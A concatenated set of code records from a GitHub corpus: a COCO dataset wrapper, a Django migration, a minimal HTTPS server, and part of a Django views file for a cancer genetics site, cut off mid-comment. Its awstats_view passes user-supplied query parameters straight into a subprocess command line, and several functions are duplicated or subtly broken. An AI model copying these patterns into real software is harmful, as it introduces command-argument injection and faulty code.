spatial_size):\n \"\"\"Copied from `torchvision/datapoints/_dataset_wrapper.py`\"\"\"\n\n segmentation = (\n mask.frPyObjects(segmentation, *spatial_size)\n if isinstance(segmentation, dict)\n else mask.merge(mask.frPyObjects(segmentation, *spatial_size))\n )\n return torch.from_numpy(mask.decode(segmentation))\n\n def wrapper(self, idx, sample):\n \"\"\"Copied from `torchvision/datapoints/_dataset_wrapper.py`\"\"\"\n image_id = self.ids[idx]\n\n image, target = sample\n\n if not target:\n return image, dict(image_id=image_id)\n\n batched_target = list_of_dicts_to_dict_of_lists(target)\n\n batched_target[\"image_id\"] = image_id\n\n spatial_size = tuple(F.get_spatial_size(image))\n batched_target[\"boxes\"] = F.convert_format_bounding_box(\n datapoints.BoundingBox(\n batched_target[\"bbox\"],\n format=datapoints.BoundingBoxFormat.XYWH,\n spatial_size=spatial_size,\n ),\n new_format=datapoints.BoundingBoxFormat.XYXY,\n )\n batched_target[\"masks\"] = datapoints.Mask(\n torch.stack(\n [\n self.segmentation_to_mask(\n segmentation, spatial_size=spatial_size\n )\n for segmentation in batched_target[\"segmentation\"]\n ]\n ),\n )\n batched_target[\"labels\"] = torch.tensor(batched_target[\"category_id\"])\n return image, batched_target\n\n\ndef collate(batch):\n return tuple(zip(*batch))\n","repo_name":"calgaryml/condensed-sparsity","sub_path":"src/rigl_torch/datasets/_coco_detection_v2.py","file_name":"_coco_detection_v2.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"3527414662","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n 
('email', models.EmailField(max_length=254)),\n ('message', models.TextField()),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'verbose_name_plural': 'Contact Messages',\n },\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('organizer', models.CharField(max_length=120)),\n ('slug', models.SlugField(unique=True)),\n ('venue', models.CharField(max_length=100)),\n ('description', models.TextField(max_length=500)),\n ('timestamp', models.DateField(auto_now=True)),\n ('start_date', models.DateField()),\n ('end_date', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='MailInvites',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject', models.CharField(max_length=50)),\n ('recipients', models.EmailField(max_length=100)),\n ('message', models.TextField(max_length=500)),\n ],\n options={\n 'verbose_name_plural': 'Mail invites',\n },\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"Hamfri/organizer","sub_path":"organize/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30273500930","text":"#!/usr/bin/env python\n\nimport os, sys, io\nimport http.server, socketserver\nimport ssl\n\nclass Handler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n http.server.SimpleHTTPRequestHandler.do_GET(self);\n\n def do_POST(self):\n print('TODO do_POST with self={}'.format(self))\n\n\ndef main():\n if not os.path.exists('scratch'):\n os.makedirs('scratch')\n\n ssl_key_path = os.path.abspath( os.path.join('ssl', 'key.pem') )\n ssl_cert_path = os.path.abspath( os.path.join('ssl', 'cert.pem') )\n\n\n os.chdir('www')\n httpd = socketserver.TCPServer(('', 4443), Handler)\n httpd.socket = ssl.wrap_socket(httpd.socket,\n keyfile=ssl_key_path,\n certfile=ssl_cert_path,\n server_side=True\n )\n print('Listening on https://[::]:4443')\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n\n\n\nif __name__ == '__main__':\n os.chdir( os.path.dirname(os.path.abspath(__file__)) )\n main()\n","repo_name":"Jeffrey-P-McAteer/e-yoga-01","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5079582316","text":"import csv, time\nimport json # For ajax for the jquery autocomplete search box\nimport math # For ceil()\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError\nfrom datetime import datetime # For get_timming() and log_comment()\nimport requests # for Enrichr and mailgun email server\nimport ipaddress # For is_valid_ip()\nimport subprocess, io, os # Used for awstats_view()\n\nfrom django.http import HttpResponse #, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.cache import cache # To cache previous results. 
NOTE: \"To provide thread-safety, a different instance of the cache backend will be returned for each thread.\"\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone # For log_comment(), with USE_TZ=True in settings.py, and istall \"pytz\"\nfrom django.db.models import Q # Used for get_drivers()\n\nfrom .models import Study, Gene, Dependency, Comment #, News, Download # Removed: Histotype,\n\nfrom django.conf import settings # import the settings file for the Google analytics ID. Maybe better to use a context processor in the settings.py file: https://chriskief.com/2013/09/19/access-django-constants-from-settings-py-in-a-template/ and: http://www.nomadblue.com/blog/django/google-analytics-tracking-code-into-django-project/\n# or use the settings export script: https://github.com/jkbrzt/django-settings-export (see: http://stackoverflow.com/questions/433162/can-i-access-constants-in-settings-py-from-templates-in-django and: http://stackoverflow.com/questions/629696/deploying-google-analytics-with-django and: https://github.com/montylounge/django-google-analytics )\n\n# Optionally use Django logging during development and testing:\n# This Django logging is configured in settings.py and is based on: http://ianalexandr.com/blog/getting-started-with-django-logging-in-5-minutes.html\n#import logging\n#logger = logging.getLogger(__name__)\n#def log(): logger.debug(\"this is a debug message!\")\n#def log_error(): logger.error(\"this is an error message!!\")\n\n# Mime types for the responses:\nhtml_mimetype = 'text/html; charset=utf-8'\njson_mimetype = 'application/json; charset=utf-8'\ncsv_mimetype = 'text/csv; charset=utf-8' # can be called: 'application/x-csv' or 'application/csv'\ntab_mimetype = 'text/tab-separated-values; charset=utf-8'\nplain_mimetype ='text/plain; charset=utf-8'\n#excel_minetype ='application/vnd.ms-excel'\nexcel_minetype ='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' # for xlsx format?\n\n# Alternatively can use separate parameter in HtmlResponse: charset='UTF-8' instead of including 'charset=utf-8' in the content_type\n\n# Enricher URL:\nENRICHR_BASE_URL = 'http://amp.pharm.mssm.edu/Enrichr/'\n\ndef post_or_get_from_request(request, name):\n if request.method == 'POST': return request.POST.get(name, '')\n elif request.method == 'GET': return request.GET.get(name, '')\n else: return ''\n \ndef JsonResponse(data, safe=False):\n \"\"\" Could use the Django JsonResponse but less format options, so using HtmlResponse() \"\"\"\n # eg: django.http.JsonResponse(data, safe=safe)\n return HttpResponse(json.dumps(data, separators=[',',':']), content_type=json_mimetype)\n\ndef PlainResponse(msg):\n return HttpResponse(msg, content_type=plain_mimetype)\n\ndef json_error(message, status_code='1'):\n \"\"\" Sends an error message to the browser in JSON format \"\"\"\n return JsonResponse( {'success': False, 'error': status_code, 'message': message } ) # eg: str(exception)\n\ndef html_error(msg):\n return HttpResponse(\"
Error:
\"+msg)\n\ndef plain_error(msg):\n return PlainResponse(msg)\n\n\ndef is_search_by_driver(search_by):\n \"\"\" Checks if the 'search_by' parameter is valid, returning True if the dependency search is by driver \"\"\"\n if search_by == 'driver': return True\n elif search_by == 'target': return False\n else: print(\"ERROR: **** Invalid search_by: '%s' ****\" %(search_by))\n\ndef get_study_shortname_from_study_list(study_pmid, study_list):\n if (study_pmid is None) or (study_pmid == ''):\n return ''\n if study_pmid==\"ALL_STUDIES\":\n return \"All studies\"\n try:\n study = study_list.get(study_pmid=study.pmid)\n# Or iterate through the list:\n# for study in study_list:\n# if study_pmid == study.pmid:\n return study.short_name\n except ObjectDoesNotExist: # Not found by the objects.get()\n print(\"WARNING: '\"+study_pmid+\"' NOT found in database so will be ignored\")\n return '' # ie. if study_pmid parameter value not found then ignore it.\n\n\n\ndef get_timing(start_time, name, time_list=None):\n \"\"\" Prints the time taken by functions, to help optimise the code and SQL queries.\n The start_time parameter value should be obtained from: datetime.now()\n Optionally if 'time_list' is passed then an array of timings is added to this list that can then be sent to Webbrowser console via JSON. A python list (array) is used (rather than a dictionary) so will preserve the order of elements. \"\"\"\n duration = datetime.now() - start_time # This duration is in milliseconds\n # To print results in server log, use:\n # print( \"%s: %s msec\" %(name,str(duration))) # or use: duration.total_seconds()\n if time_list is not None:\n if not isinstance(time_list, list):\n print(\"ERROR: get_timings() 'time_list' parameter is not a list\")\n #if name in time_dict: print(\"WARNING: Key '%s' is already in the time_dict\" %(name))\n time_list.append({name: str(duration)})\n return datetime.now()\n\n\ndef awstats_view(request):\n awstats_dir = \"/home/cgenetics/awstats\"\n awstats_script = os.path.join(awstats_dir, \"wwwroot/cgi-bin/awstats.pl\")\n # awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\") # Test script for debugging.\n \n # Local test settings:\n #awstats_dir = \"/Users/sbridgett/Documents/UCD/cgdd\"\n #awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\")\n\n# Also added: PLUGIN: DecodeUTFKeys\n# REQUIRED MODULES: Encode and URI::Escape\n# PARAMETERS: None\n# DESCRIPTION: Allow AWStats to show correctly (in language charset)\n# keywords/keyphrases strings even if they were UTF8 coded by the\n# referer search engine.\n#\n# SJB enabled this plugin to cope with some server names in UTF8\n# LoadPlugin=\"decodeutfkeys\"\n perl5lib_for_decodeutfkeys = awstats_dir+\"/URI-1.71/lib:\"+awstats_dir+\"/Encode-2.88/install_dir/lib/perl/5.18.2\"\n \n perl5lib_for_geoip = awstats_dir+\"/Geo-IP-1.50/install_dir/lib/perl/5.18.2\" # Path to the Geo-IP module used by awstats.pl. 
Could add: +os.pathsep+os.environ['PERL5LIB']\n config = \"awstats.cancergd.org.conf\" # awstats config file (in awstats_dir/wwwroot/cgi-bin) for gathering and displaying the cancergd stats.\n\n cmd = [ awstats_script, '-config='+config ]\n env = dict(os.environ, PERL5LIB=perl5lib_for_geoip+':'+perl5lib_for_decodeutfkeys)\n # Alternatively copy the existing env and then modify it, so can add to any existing PERL5LIB:\n # env = os.environ.copy()\n # env['PERL5LIB'] = perl5lib_for_geoip + os.pathsep + env['PERL5LIB'] # note: os.pathsep is : or ; whereas os.path.sep is \\\\ or /\n \n \n if len(request.GET.dict())==0: # as just called with /stats so set default:\n cmd.append('-output')\n else:\n for key,val in request.GET.items():\n if key=='config': continue # Always set to this config option above (just in case accidentally or deliberately user tries a different config)\n cmd.append('-'+key+'='+val) # eg: output, hostfilter, hostfilterex\n\n \n print(\"cmd\",cmd)\n \n p = subprocess.Popen( cmd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n # Optionally add: stderr=subprocess.PIPE, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n # For 'shell=True' submit the whole command as one string, but this starts a new shell process (which is an expensive operation).\n # If submit the command with 'shell=False', give the command as a list of strings, with the command name in the first element of the list, the first argument in the next list element, etc.\n # But need 'shell=True' for eg: ls and rmdir which are not programs, but are internal commands within the shell program.\n # 'universal_newlines=True' means will return Strings (rather than Bytes)\n # Maybe 'bufsize=-1'\n\n # \"This will deadlock when using stdout=PIPE or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. 
Use Popen.communicate() when using pipes to avoid that.\n # \"Use the communicate() method rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to streams pausing reading or writing and blocking the child process.\n\n # awstats output seems to be in \"iso-8859-1\" rather than \"uft-8\" see: https://sourceforge.net/p/awstats/discussion/43428/thread/b5cbb36c/\n # So can get error about: \n # File \"/home/cgenetics/cancergd/gendep/views.py\", line 146, in awstats_view\n # stdout, stderr = p.communicate(timeout=None)\n # File \"/usr/lib/python3.4/subprocess.py\", line 960, in communicate\n # stdout, stderr = self._communicate(input, endtime, timeout)\n # File \"/usr/lib/python3.4/subprocess.py\", line 1659, in _communicate\n # self.stdout.encoding)\n # File \"/usr/lib/python3.4/subprocess.py\", line 888, in _translate_newlines\n # data = data.decode(encoding)\n # UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe7 in position 93349: invalid continuation byte\n\n stdout, stderr = p.communicate(timeout=None)\n # except TimeoutExpired:\n # os.killpg(process.pid, signal)\n if p.returncode != 0:\n return html_error( \"awstats failed with error code: %d StdErr: %s\" %(p.returncode, '' if stderr is None else stderr) )\n\n # For the 'AllowUpdatesFromBrowser=1' awstats config option, the update button link: http://www.cancergd.org/gendep/awstats/awstats?config=awstats.cancergd.org.conf&update=1\n # If there are any updates then will the stdout will start with:\n # Create/Update database for config \"/home/cgenetics/awstats/awstats.cancergd.org.conf\" by AWStats version 7.5 (build 20160301)\n # From data in log file \"/home/cgenetics/awstats/tools/logresolvemerge.pl /var/log/*access.log* |\"...\n # As if the \"Update Now\" is clicked with a subsection then the updated datta is returned.\n if \"-update=1\" in cmd and stdout[:len(\"Create/Update database\")]==\"Create/Update database\":\n stdout = stdout.replace(\"\\n\",\"
\\n\")\n stdout += '
'\n\n # Could add logout link: http://127.0.0.1:8000/admin/logout/ which is reverse( 'logout' ) or reverse( 'admin:logout' )\n logout_link = '

Admin LOG OUT

'\n return HttpResponse( (\"\" if stderr==\"\" else \"ERROR:
\"+stderr+\"
\\n\\n\") + logout_link +stdout ) \n # Could add to the update now link in the awstats.pl srcript: padding: 10px 20px; \n\n awstats_dir = \"/home/cgenetics/awstats\"\n awstats_script = \"${awstats_dir}/wwwroot/cgi-bin/awstats.pl\"\n \n # awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\") # Test script for debugging.\n \n # Local test settings:\n #awstats_dir = \"/Users/sbridgett/Documents/UCD/cgdd\"\n #awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\")\n\n perl5lib_for_geoip = awstats_dir+\"/Geo-IP-1.50/install_dir/lib/perl/5.18.2\" # Path to the Geo-IP module used by awstats.pl. Could add: +os.pathsep+os.environ['PERL5LIB']\n config = \"awstats.cancergd.org.conf\" # awstats config file (in awstats_dir/wwwroot/cgi-bin) for gathering and displaying the cancergd stats.\n\n cmd = [ awstats_script, '-config='+config ]\n env = dict(os.environ, PERL5LIB=perl5lib_for_geoip)\n # Alternatively copy the existing env and then modify it, so can add to any existing PERL5LIB:\n # env = os.environ.copy()\n # env['PERL5LIB'] = perl5lib_for_geoip + os.pathsep + env['PERL5LIB'] # note: os.pathsep is : or ; whereas os.path.sep is \\\\ or /\n \n \n if len(request.GET.dict())==0: # as just called with /stats so set default:\n cmd.append('-output')\n else:\n for key,val in request.GET.items():\n if key=='config': continue # Always set to this config option above (just in case accidentally or deliberately user tries a different config)\n cmd.append('-'+key+'='+val) # eg: output, hostfilter, hostfilterex\n\n \n print(\"cmd\",cmd)\n \n p = subprocess.Popen( cmd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n # Optionally add: stderr=subprocess.PIPE, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n # For 'shell=True' submit the whole command as one string, but this starts a new shell process (which is an expensive operation).\n # If submit the command with 'shell=False', give the command as a list of strings, with the command name in the first element of the list, the first argument in the next list element, etc.\n # But need 'shell=True' for eg: ls and rmdir which are not programs, but are internal commands within the shell program.\n # 'universal_newlines=True' means will return Strings (rather than Bytes)\n # Maybe 'bufsize=-1'\n\n # \"This will deadlock when using stdout=PIPE or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. Use Popen.communicate() when using pipes to avoid that.\n # \"Use the communicate() method rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to streams pausing reading or writing and blocking the child process. 
\n\n # awstats output seems to be in \"iso-8859-1\" rather than \"uft-8\" see: https://sourceforge.net/p/awstats/discussion/43428/thread/b5cbb36c/\n # So can get error about: \n # File \"/home/cgenetics/cancergd/gendep/views.py\", line 146, in awstats_view\n # stdout, stderr = p.communicate(timeout=None)\n # File \"/usr/lib/python3.4/subprocess.py\", line 960, in communicate\n # stdout, stderr = self._communicate(input, endtime, timeout)\n # File \"/usr/lib/python3.4/subprocess.py\", line 1659, in _communicate\n # self.stdout.encoding)\n # File \"/usr/lib/python3.4/subprocess.py\", line 888, in _translate_newlines\n # data = data.decode(encoding)\n # UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe7 in position 93349: invalid continuation byte\n\n stdout, stderr = p.communicate(timeout=None)\n # except TimeoutExpired:\n # os.killpg(process.pid, signal)\n if p.returncode != 0:\n return html_error( \"awstats failed with error code: %d StdErr: %s\" %(p.returncode, '' if stderr is None else stderr) )\n\n # For the 'AllowUpdatesFromBrowser=1' awstats config option, the update button link: http://www.cancergd.org/gendep/awstats/awstats?config=awstats.cancergd.org.conf&update=1\n # If there are any updates then will the stdout will start with:\n # Create/Update database for config \"/home/cgenetics/awstats/awstats.cancergd.org.conf\" by AWStats version 7.5 (build 20160301)\n # From data in log file \"/home/cgenetics/awstats/tools/logresolvemerge.pl /var/log/*access.log* |\"...\n # As if the \"Update Now\" is clicked with a subsection then the updated datta is returned.\n if \"-update=1\" in cmd and stdout[:len(\"Create/Update database\")]==\"Create/Update database\":\n stdout = stdout.replace(\"\\n\",\"
\\n\")\n stdout += '
'\n\n # Could add logout link: http://127.0.0.1:8000/admin/logout/ which is reverse( 'logout' ) or reverse( 'admin:logout' )\n logout_link = '

Admin LOG OUT

'\n return HttpResponse( (\"\" if stderr==\"\" else \"ERROR:
\"+stderr+\"
\\n\\n\") + logout_link +stdout ) \n # Could add to the update now link in the awstats.pl srcript: padding: 10px 20px; \n\n#=======\n\n\n\n\n\n# From: http://stackoverflow.com/questions/10340684/group-concat-equivalent-in-django\n# Django doesn't have built-in support for GROUP_CONCAT (which is available in SQLite and MySQL), so create an Aggregate class for it:\n\nfrom django.db.models import Aggregate, CharField, F\n\nclass Concat(Aggregate):\n # supports COUNT(distinct field)\n function = 'GROUP_CONCAT'\n \n engine = settings.DATABASES['default']['ENGINE']\n if engine == 'django.db.backends.sqlite3':\n template = '%(function)s(%(distinct)s%(expressions)s)' # Added separator doesn't doesn't work in sqlite when DISTINCT. No order by within the GROUP_CONCAT in Sqlite\n elif engine == 'django.db.backends.mysql':\n template = '%(function)s(%(distinct)s%(expressions) ORDER BY s%(expressions) SEPARATOR \",\")' # but doesn't work in sqlite.\n elif engine == 'django.db.backends.postgresql': # https://coderwall.com/p/eyknwa/postgres-group_concat\n template = 'string_agg(%(distinct)s%(expressions), \",\" ORDER BY %(expressions)s)' # add order by after separator and without a comma before it: https://www.postgresql.org/docs/9.5/static/sql-expressions.html#SYNTAX-AGGREGATES\n else:\n html_error(\"Unexpected database engine: %s\" %(engine))\n \n # template = '%(function)s(%(distinct)s%(expressions)s,\";\")' # but doesn't work in sqlite. \n # template = '%(function)s(%(distinct)s%(expressions)s,\"%(sep)s\")'\n # sep=sep\n # BUT get error: OperationalError: DISTINCT aggregates must have exactly one argument\n # it seems from web that cannot have both DISTINCT and a custom separator\n \n # In MySQL can add: ORDER BY DESC SEPARATOR ' '\n \n def __init__(self, expression, distinct=False, **extra): # sep=';', BUT doesn't work in sqlite\n super(Concat, self).__init__(\n expression,\n distinct='DISTINCT ' if distinct else '',\n output_field=CharField(),\n **extra)\n# use it simply as:\n\n# query_set = Fruits.objects.values('type').annotate(count=Count('type'),\n# name = Concat('name')).order_by('-count')\n\n\n# OR:\n# In the upcoming Django 1.8 you could just implement GroupConcat expression, and then the query would look like:\n# Event.objects.values('slug').annotate(emails=GroupConcat('task__person__email'))\n# The .values().annotate() combination sets the GROUP BY to slug, and of course the GroupConcat implementation does the actual aggregation.\n# For how to write the GroupConcat implementation check out https://docs.djangoproject.com/en/dev/ref/models/expressions/#writing-your-own-query-expressions\n\ndef group_concat(column):\n engine = settings.DATABASES['default']['ENGINE']\n if engine == 'django.db.backends.sqlite3':\n return \"GROUP_CONCAT(DISTINCT %s)\" %(column) # Added separator doesn't doesn't work in sqlite when DISTINCT. 
No ORDER BY within the GROUP_CONCAT in Sqlite\n elif engine == 'django.db.backends.mysql':\n return \"GROUP_CONCAT(DISTINCT %s ORDER BY %s)\" %(column,column) # In MySQl can add: SEPARATOR \",\" \n elif engine == 'django.db.backends.postgresql': # https://coderwall.com/p/eyknwa/postgres-group_concat\n return \"string_agg(DISTINCT %s, ',' ORDER BY %s)\" %(column,column) # add order by after separator and without a comma before it: https://www.postgresql.org/docs/9.5/static/sql-expressions.html#SYNTAX-AGGREGATES\n else:\n html_error(\"Unexpected database engine: %s\" %(engine))\n return \"ERROR\"\n\n\ndef build_driver_list(webpage):\n # An alternative to creating these concatenated histotype and study lists is:\n # for one driver:\n # select distinct pmid from gendep_dependency where driver='ERBB2' order by pmid;\n # select distinct histotype from gendep_dependency where driver='ERBB2' order by histotype;\n\n # or for all drivers:\n # select distinct driver, histotype from gendep_dependency order by driver,histotype;\n # select distinct driver, pmid from gendep_dependency order by driver,pmid;\n\n # For the full three-way data, so could set menus based on the other choices:\n # select distinct driver, histotype, pmid from gendep_dependency order by driver, histotype, pmid;\n\n\n # If the values() clause precedes the annotate(), the annotation will be computed using the grouping described by the values() clause:\n # query_seq = Dependency.objects.values('driver_id','driver__full_name','driver__prevname_synonyms').annotate(histotypes=Concat('histotype',distinct=True),studies=Concat('study_id',distinct=True)).order_by('driver_id')\n \n # SELECT \"gendep_dependency\".\"driver\", \"gendep_gene\".\"full_name\", \"gendep_gene\".\"prevname_synonyms\", GROUP_CONCAT(DISTINCT \"gendep_dependency\".\"histotype\") AS \"histotypes\", GROUP_CONCAT(DISTINCT \"gendep_dependency\".\"pmid\") AS \"studies\" FROM \"gendep_dependency\" INNER JOIN \"gendep_gene\" ON (\"gendep_dependency\".\"driver\" = \"gendep_gene\".\"gene_name\") GROUP BY \"gendep_dependency\".\"driver\", \"gendep_gene\".\"full_name\", \"gendep_gene\".\"prevname_synonyms\" ORDER BY \"gendep_dependency\".\"driver\" ASC driver histotypes study\n\n\n # (3) Use RAW SQL:\n if settings.DATABASES['default']['ENGINE'] == 'django.db.backends.mysql':\n histotype_order = ' ORDER BY D.histotype'\n pmid_order = ' ORDER BY D.pmid'\n else:\n histotype_order = ''\n pmid_order = ''\n \n if webpage == 'searchpage':\n # Three possible queries:\n # (1) With precomputed lists in model.py: \n # driver_list = Gene.objects.filter(is_driver=True).only(\"gene_name\", \"full_name\", \"prevname_synonyms\", \"driver_histotype_list\", \"driver_study_list\").order_by('gene_name')\n\n # (2) Using Django ORM\n #driver_list = Dependency.objects.values('driver_id').annotate(full_name=F('driver__full_name'),prevname_synonyms=F('driver__prevname_synonyms'), entrez_id=F('driver__entrez_id'), driver_histotype_list=Concat('histotype',distinct=True), driver_study_list=Concat('study_id',distinct=True) ).order_by('driver_id')\n # But this includes the full_name and synonyms in the GROUP BY list.\n # Could try querying using the Gene object - but this isn't working yet:\n # driver_list = Gene.objects.values('gene_name').annotate(full_name=F('full_name'),prevname_synonyms=F('prevname_synonyms'), entrez_id=F('entrez_id'), driver_histotype_list=Concat('histotype',distinct=True), driver_study_list=Concat('study_id',distinct=True) ).order_by('driver_id')\n \n driver_list = 
Gene.objects.raw(\"SELECT G.gene_name, G.entrez_id, G.full_name, G.prevname_synonyms, \"\n + group_concat('D.histotype') + \" AS driver_histotype_list, \" # + \"GROUP_CONCAT(DISTINCT D.histotype\"+histotype_order+\") AS driver_histotype_list, \"\n + group_concat('D.pmid') + \" AS driver_study_list \" # \"GROUP_CONCAT(DISTINCT D.pmid\"+pmid_order+\") AS driver_study_list \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_entrez = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.gene_name) \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_name = G.gene_name) \" # Now using Entrez_id as primary key for Gene\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n# + \"GROUP BY D.driver_entrez ORDER BY G.entrez_id ASC\" # <-- Maybe should use this if always 1-to-1 mapping of entrez_id to driver_name\n + \"GROUP BY D.driver ORDER BY G.gene_name ASC\" \n )\n \n elif webpage == 'driverspage':\n # (1) With precomputed lists in model.py:\n # driver_list = Gene.objects.filter(is_driver=True).order_by('gene_name') # Needs: (is_driver=True), not just: (is_driver)\n\n driver_list = Gene.objects.raw(\"SELECT G.gene_name, G.entrez_id, G.full_name, G.prevname_synonyms, G.ensembl_id, G.hgnc_id, \"\n + \"COUNT(DISTINCT D.pmid) AS driver_num_studies, \"\n + \"COUNT(DISTINCT D.histotype) AS driver_num_histotypes, \"\n + \"COUNT(DISTINCT D.target) AS driver_num_targets, \"\n + group_concat('D.histotype') + \" AS driver_histotype_list, \"\n + group_concat('D.pmid') + \" AS driver_study_list \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.gene_name) \" \n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_entrez = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene \n# + \"GROUP BY D.driver_entrez ORDER BY G.entrez_id ASC\"\n + \"GROUP BY D.driver ORDER BY G.gene_name ASC\" \n )\n \n else: html_error(\"build_driver_list() Unexpected page: '%s'\" %(webpage))\n \n print(driver_list.query)\n \n return driver_list\n\n\ndef build_driver_histotype_study_list(webpage):\n if webpage == 'searchpage':\n driver_histotype_study_list = Gene.objects.raw(\"SELECT G.gene_name, D.driver AS entrez_id, D.histotype, \"\n + group_concat('D.pmid') + \" AS study_list \"\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n + \"GROUP BY D.driver, D.histotype ORDER BY G.gene_name, D.histotype ASC\"\n )\n #elif webpage == 'driverspage': \n else: html_error(\"build_driver_histotype_study_list() Unexpected page: '%s'\" %(webpage))\n\n print(driver_histotype_study_list.query)\n #for d in driver_histotype_study_list:\n # print(d.gene_name,d.entrez_id,d.histotype,d.study_list)\n return driver_histotype_study_list\n\n\n\n\ndef sort_list(list):\n return ','.join( sorted(list.split(',')) )\n \n\ndef index(request, search_by = 'driver', gene_name='', histotype_name='', study_pmid=''): # Add entrez_id as parameter in future ?\n \"\"\" Sets the javascript arrays for driver, histotypes and studies within the main home/index page.\n As the index page can be called with specified values, eg: '.../driver/ERBB2/PANCAN/26947069/'\n Then calls the 'index.html' template to create the 
webpage.\n The 'search_by' is usually by driver, but for the \"SearchByTarget\" webpage, it will be set to 'target' \"\"\"\n \n # Obtain the list of driver genes for the autocomplete box.\n # (Or for the 'Search-ByTarget' webpage, get the list of target genes).\n \n if is_search_by_driver(search_by):\n driver_list = build_driver_list('searchpage')\n driver_count = -1 # driver_list.count() doesn't work, as RAW query set has no .count() attribute, and driver count is only needed for the search by target.\n driver_histotype_study_list = build_driver_histotype_study_list('searchpage')\n target_list = []\n else: \n # This needs: (is_target=True), not just: (is_target)\n target_list = Gene.objects.filter(is_target=True).only(\"gene_name\", \"entrez_id\", \"full_name\", \"prevname_synonyms\").order_by('gene_name')\n driver_list = []\n driver_count = Gene.objects.filter(is_driver=True).count()\n driver_histotype_study_list = []\n\n # From testing the three different methods give the sample results\n #print(driver_list.query)\n #print(\"driver\\tfullname\\tsynonyms\\thistotypes\\tstudies\")\n #with open(\"junk123.orm\",\"w\") as f:\n # print(\"Writing .......\")\n # for d in driver_list:\n #print(d.gene_name,\"\\t\",d.full_name,\"\\t\",d.prevname_synonyms,\"\\t\", sort_list(d.driver_histotype_list),\"\\t\", sort_list(d.driver_study_list)) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"] \n #f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" %(d.gene_name, d.full_name, d.prevname_synonyms, sort_list(d.driver_histotype_list), sort_list(d.driver_study_list)) ) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"]\n #f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" %(d['driver_id'], d['full_name'], d['prevname_synonyms'], sort_list(d['driver_histotype_list']), sort_list(d['driver_study_list'])) ) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"]\n\n\n # Retrieve the tissue, experiment type, and study data:\n histotype_list = Dependency.HISTOTYPE_CHOICES\n # Alternatively if using histotype table (in the 'models.py' instead of 'choices' list): histotype_list = Histotype.objects.order_by('full_name')\n experimenttype_list = Study.EXPERIMENTTYPE_CHOICES\n study_list = Study.objects.order_by('pmid')\n \n # As this page could in future be called from the 'drivers' or 'targets' page, with the gene_name as a standard GET or POST parameter (instead of the Django '/gene_name' parameter option in url.py):\n # if (gene_name is None) or (gene_name == ''):\n # gene_name = post_or_get_from_request(request, 'gene_name')\n \n # Set the default histotype to display in the Tissues menu:\n # Previously this 